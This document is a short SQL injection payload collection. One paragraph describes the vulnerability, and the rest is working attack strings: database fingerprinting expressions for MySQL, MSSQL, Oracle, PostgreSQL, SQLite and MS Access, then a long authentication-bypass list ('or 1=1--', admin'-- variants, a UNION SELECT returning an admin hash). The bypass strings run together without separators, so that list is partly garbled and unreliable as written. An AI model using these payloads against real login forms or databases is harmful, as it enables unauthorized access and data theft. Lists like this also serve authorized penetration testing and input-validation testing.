The SQL injection vulnerability in web applications occurs when user inputs are not properly sanitized, allowing attackers to inject malicious SQL code into queries. This can lead to unauthorized access to the database, data theft, data manipulation, or even the complete compromise of the application's backend database, resulting in significant security breaches and data loss.
["conv('a',16,2)=conv('a',16,2)","MYSQL"],["connection_id()=connection_id()","MYSQL"],["crc32('MySQL')=crc32('MySQL')","MYSQL"],["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)","MSSQL"],["@@CONNECTIONS>0","MSSQL"],["@@CONNECTIONS=@@CONNECTIONS","MSSQL"],["@@CPU_BUSY=@@CPU_BUSY","MSSQL"],["USER_ID(1)=USER_ID(1)","MSSQL"],["ROWNUM=ROWNUM","ORACLE"],["RAWTOHEX('AB')=RAWTOHEX('AB')","ORACLE"],["LNNVL(0=123)","ORACLE"],["5::int=5","POSTGRESQL"],["5::integer=5","POSTGRESQL"],["pg_client_encoding()=pg_client_encoding()","POSTGRESQL"],["get_current_ts_config()=get_current_ts_config()","POSTGRESQL"],["quote_literal(42.5)=quote_literal(42.5)","POSTGRESQL"],["current_database()=current_database()","POSTGRESQL"],["sqlite_version()=sqlite_version()","SQLITE"],["last_insert_rowid()>1","SQLITE"],["last_insert_rowid()=last_insert_rowid()","SQLITE"],["val(cvar(1))=1","MSACCESS"],["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0","MSACCESS"],["cdbl(1)=cdbl(1)","MSACCESS"],["1337=1337","MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],["'i'='i'","MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
Authentication Bypass
'-'' ''&''^''*'' or 1=1 limit 1 -- -+'="or'' or ''-'' or '' '' or ''&'' or ''^'' or ''*''-||0'"-||0""-""""&""^""*"'--'"--"'--'/"--"" or ""-"" or "" "" or ""&"" or ""^"" or ""*"ortrue--" or true--' or true--") ortrue--') or true--'or'x'='x') or ('x')=('x')) or (('x'))=(('x" or "x"="x") or ("x")=("x")) or (("x"))=(("xor 2 like 2or 1=1or 1=1--or 1=1#or 1=1/*admin'--admin' -- -admin' #admin'/*admin'or'2'LIKE'1admin'or2LIKE2--admin' or 2 LIKE 2#admin') or2LIKE2#admin') or 2 LIKE 2--admin') or ('2'LIKE'2admin') or ('2'LIKE'2'#admin') or ('2' LIKE '2'/*admin'or'1'='1admin'or'1'='1'--admin' or '1'='1'#admin'or'1'='1'/*admin'or 1=1 or ''='admin' or 1=1admin' or 1=1--admin' or 1=1#admin' or 1=1/*admin') or ('1'='1admin') or ('1'='1'--admin') or ('1'='1'#admin') or ('1'='1'/*admin') or '1'='1admin') or '1'='1'--admin') or '1'='1'#admin') or '1'='1'/*1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055admin" --admin';-- azer admin" #admin"/*admin" or "1"="1admin" or "1"="1"--admin" or "1"="1"#admin" or "1"="1"/*admin"or 1=1 or ""="admin" or 1=1admin" or 1=1--admin" or 1=1#admin" or 1=1/*admin") or ("1"="1admin") or ("1"="1"--admin") or ("1"="1"#admin") or ("1"="1"/*admin") or "1"="1admin") or "1"="1"--admin") or "1"="1"#admin") or "1"="1"/*1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055